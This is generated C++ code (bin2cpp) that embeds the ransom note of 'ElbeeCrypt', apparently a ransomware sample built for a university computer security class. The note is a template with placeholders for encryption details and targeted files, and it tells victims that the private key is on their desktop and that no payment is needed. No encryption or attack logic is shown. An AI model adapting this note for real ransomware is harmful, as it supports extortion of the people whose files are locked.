/**
 * This file was generated by bin2cpp v3.0.0
 * Copyright (C) 2013-2021 end2endzone.com. All rights reserved.
 * bin2cpp is open source software, see http://github.com/end2endzone/bin2cpp
 * Source code for file 'recover-your-files.txt', last modified 1668413735.
 * Do not modify this file.
 */
#ifndef RECOVER_YOUR_FILES_H
#define RECOVER_YOUR_FILES_H

#include <stddef.h>

namespace bin2cpp
{
  #ifndef BIN2CPP_EMBEDDEDFILE_CLASS
  #define BIN2CPP_EMBEDDEDFILE_CLASS
  class File
  {
  public:
	virtual ~File() = default; //This is here to get rid of a GCC warning. Perhaps add a pull r
    virtual size_t getSize() const = 0;
    /* DEPRECATED */ virtual inline const char * getFilename() const { return getFileName(); }
    virtual const char * getFileName() const = 0;
    virtual const char * getFilePath() const = 0;
    virtual const char * getBuffer() const = 0;
    virtual bool save(const char * filename) const = 0;
  };
  #endif //BIN2CPP_EMBEDDEDFILE_CLASS
  const File & getRecoveryourfilesTxtFile();
}; //bin2cpp

#endif //RECOVER_YOUR_FILES_H
/**
 * This file was generated by bin2cpp v3.0.0
 * Copyright (C) 2013-2021 end2endzone.com. All rights reserved.
 * bin2cpp is open source software, see http://github.com/end2endzone/bin2cpp
 * Source code for file 'recover-your-files.txt', last modified 1668413735.
 * Do not modify this file.
 */
#if defined(_WIN32) && !defined(_CRT_SECURE_NO_WARNINGS)
#define _CRT_SECURE_NO_WARNINGS
#endif

#include <string> //for std::string
#include <iostream>
#include <fstream>  //for ofstream
namespace bin2cpp
{
  class RecoveryourfilesTxtFile : public virtual bin2cpp::File
  {
  public:
    RecoveryourfilesTxtFile() { build(); }
    virtual ~RecoveryourfilesTxtFile() {}
    virtual size_t getSize() const { return 2271; }
    virtual const char * getFileName() const { return "recover-your-files.txt"; }
    virtual const char * getFilePath() const { return getFileName(); }
    virtual const char * getBuffer() const { return mBuffer.c_str(); }
    void build()
    {
      mBuffer.clear();
      mBuffer.reserve(getSize()); //allocate all required memory at once to prevent reallocations
      mBuffer.append("### ELBEECRYPT ###\n\nIf you are reading this, it means your personal files were locked by ElbeeCrypt, an experimental ransomware sample made as a project for CSULB\'s CECS-378 computer security class. A", 200);
      mBuffer.append("ll of your images, videos, music, documents, etc have been securely encrypted using public key cryptography. More information about this run, including the fingerprint of the public key used, can be f", 200);
      mBuffer.append("ound below:\n\nEncryption scheme: %encryption_scheme%\nKeypair type: %keypair_type%\nPublic key fingerprint: %public_key_fingerprint%\nTargeted extensions: %target_extensions%\nRoot directories: %root_direc", 200);
      mBuffer.append("tories%\nEncrypted extension: %encrypted_extension%\nEncrypted file list location: %encrypted_filelist_location%\nTotal files encrypted: %total_encrypted%\nSpam ransom note: %spam_ransom_note%\nStartup saf", 200);
      mBuffer.append("ety net enabled: %safety_net_enabled% (was bypassed if this option is true)\n\nAlthough you are now a victim of ransomware, you are NOT required to pay any sort of monetary compensation to decrypt your ", 200);
      mBuffer.append("files. ElbeeCrypt has not discarded the unique private key used in the encryption process, and it is available on your desktop. It should be named something similar to \"elbeecrypt-privkey_<some random", 200);
      mBuffer.append(" str>.elbeecrypt-key\". Additionally, unlike many recently discovered ransomware samples, ElbeeCrypt HAS NOT submitted any of your personal files or otherwise any personally identifiable information (P", 200);
      mBuffer.append("II) to any sort of web service or 3rd party. This sample should\'ve come with a decryptor tool that will utilize your uniquely generated private key. To use the decryptor, simply open it, and follow th", 200);
      mBuffer.append("e instructions provided. You will need the decryption key as well as your encrypted files, so DO NOT RENAME OR DISCARD ANY ENCRYPTED FILE OR THE PRIVATE KEY. If you discard the private key, then your ", 200);
      mBuffer.append("files are effectively UNRECOVERABLE!\n\nPlease keep in mind that ElbeeCrypt WILL NEVER ASK YOU FOR PAYMENT TO DECRYPT YOUR FILES! If this is the case, DO NOT PAY. Instead, submit the sample to https://v", 200);
      mBuffer.append("irustotal.com and check https://id-ransomware.malwarehunterteam.com for a possible solution to get your files back. Keep in mind that these services are NOT 100% GUARANTEED to render any sort of solut", 200);
      mBuffer.append("ion and are NOT AFFILIATED with the university or any of its partners.\n", 71);
    }
    virtual bool save(const char * filename) const
    {
      std::ofstream f(filename, std::ios::out | std::ios::binary | std::ios::trunc);
      if (f.fail()) return false;
      size_t fileSize = getSize();
      const char * buffer = getBuffer();
      f.write(buffer, fileSize);
      f.close();
      return true;
    }
  private:
    std::string mBuffer;
  };
  const File & getRecoveryourfilesTxtFile() { static RecoveryourfilesTxtFile _instance; return _instance; }
}; //bin2cpp
